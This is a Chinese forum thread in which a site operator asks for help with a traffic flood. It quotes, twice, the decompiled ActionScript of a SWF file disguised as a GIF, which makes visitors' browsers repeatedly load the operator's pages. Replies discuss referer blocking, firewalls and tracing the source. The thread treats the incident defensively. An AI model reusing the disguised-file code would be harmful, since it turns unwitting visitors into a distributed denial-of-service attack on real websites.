这是一个创建于 4849 天前的主题,其中的信息可能已经有所发展或是发生改变。
此人在某个流量比较高的网站挂了一个GIF图。
打开后是红叉。
我下载到本地。 发现是用SWF伪装成的GIF
反编译后代码如下
loadMovieNum ("http://bbs.xxx.com/space.php?uid=680064", 1115191);
loadMovieNum ("http://www.xxx.com/home.php", 1115192);
loadMovieNum ("http://home.xxx.com/space.php?uid=2185", 1115193);
loadMovieNum ("http://www.xxx.com/group.php", 1115194);
loadMovieNum ("http://bbs.xxx.com/archiver/index.php?tid-658710.html", 1115195);
loadMovieNum ("http://bbs.xxx.com/task.php?action=apply&id=20", 1115196);
loadMovieNum ("http://mp3.xxx.com/hot.php", 1115197);
loadMovieNum ("http://home.xxx.com/index.php", 1115198);
if (_root._url.indexOf("img.xxxxxxxx.com") == -1) {
i = 1;
while (i <= 1000000000000 , i++) {
getURL ("http://www.taobao.com");
}
} else {
play();
}
xxx.com 是我们的网站。。
只要访客访问到他网站上的这个GIF图。就会不停的读取我们网站的数据。导致各频道频繁卡死。
各位有办法么
打开后是红叉。
我下载到本地。 发现是用SWF伪装成的GIF
反编译后代码如下
loadMovieNum ("http://bbs.xxx.com/space.php?uid=680064", 1115191);
loadMovieNum ("http://www.xxx.com/home.php", 1115192);
loadMovieNum ("http://home.xxx.com/space.php?uid=2185", 1115193);
loadMovieNum ("http://www.xxx.com/group.php", 1115194);
loadMovieNum ("http://bbs.xxx.com/archiver/index.php?tid-658710.html", 1115195);
loadMovieNum ("http://bbs.xxx.com/task.php?action=apply&id=20", 1115196);
loadMovieNum ("http://mp3.xxx.com/hot.php", 1115197);
loadMovieNum ("http://home.xxx.com/index.php", 1115198);
if (_root._url.indexOf("img.xxxxxxxx.com") == -1) {
i = 1;
while (i <= 1000000000000 , i++) {
getURL ("http://www.taobao.com");
}
} else {
play();
}
xxx.com 是我们的网站。。
只要访客访问到他网站上的这个GIF图。就会不停的读取我们网站的数据。导致各频道频繁卡死。
各位有办法么
19 条回复 • 1970-01-01 08:00:00 +08:00
 |
1
shellex 2011-01-08 21:55:56 +08:00
从flash过来的请求,Referer是多少?还有SourceIP也可以看到
|
 |
2
rety2008 OP IP比较多。。
2分钟内就已经屏蔽了大概16000多IP了。 基本都是QQ空间过来的。 |
 |
3
iugo 2011-01-08 22:05:56 +08:00
呵呵,有点意思。不知道你阻止来自该网站的页面请求可以不。
|
 |
4
predator 2011-01-08 22:19:42 +08:00 via iPod
从log入手先把可疑的referer封了。
|
 |
5
simpx 2011-01-08 22:19:55 +08:00
把referer是那个比较高的网站的流量都禁止了。不知道这样可以么?刚搜到http://www.cnblogs.com/rialover/archive/2010/10/29/1864313.html
这篇文章测试了一下通过swf访问get访问url,在有些浏览器中是可以获得正常referer的。 |
|
6
rety2008 OP 目前解决办法是开启硬件防火墙。
但是开启防火墙后 QQ空间用户只要用了他网站上的这个FLASH做装饰的。 就被当成攻击IP被屏蔽了 现在已经屏蔽了几万个了。 也就是很多QQ空间用户访问不了我们网站了 |
 |
7
Kymair 2011-01-08 22:35:51 +08:00
可以报案么?
|
|
8
rety2008 OP 看来只能报案了。
|
|
9
shellex 2011-01-08 23:19:46 +08:00
呵呵...app level的ddos,霸道无比。话说,既然是“用了他网站上的这个FLASH做装饰”,那直接溯源到“他网站”就好了。
|
 |
10
9hills 2011-01-08 23:54:04 +08:00
这个很厉害
|
 |
11
GordianZ MOD 就是cc攻击。要防的话就如#4 #5所说,ban referer可以从一定程度上解决,而且不会出现硬防IP导致QQ空间用户不能访问的结果。
|
|
12
rety2008 OP 谢谢各位。事情已经得以解决。
找到源头后。联系了该网站的管理员。 经确认,是网站内部技术人员所为。 已经撤掉这段代码。 |
|
13
rety2008 OP 现在有一个比较郁闷的事情。。
就是他这个文件已经被很多用户的浏览器缓存。 虽然服务器上已经去掉这个文件。 但攻击依然有一小部分存在。 多数为用户缓存。 对方也在想办法, 如何设置才能把这些用户的缓存快速清理掉呢 |
 |
15
napoleonu 2011-01-09 15:17:41 +08:00
做doodle的人想秒掉哪个网站岂不是真的叫秒掉,我曾经幻想Google用此方法秒God Fucked Wall
|
 |
17
xman 2011-01-09 18:18:53 +08:00
这是全部代码吗?
|
 |
19
silver0511 2011-01-19 16:48:00 +08:00
0 0
|
Select Language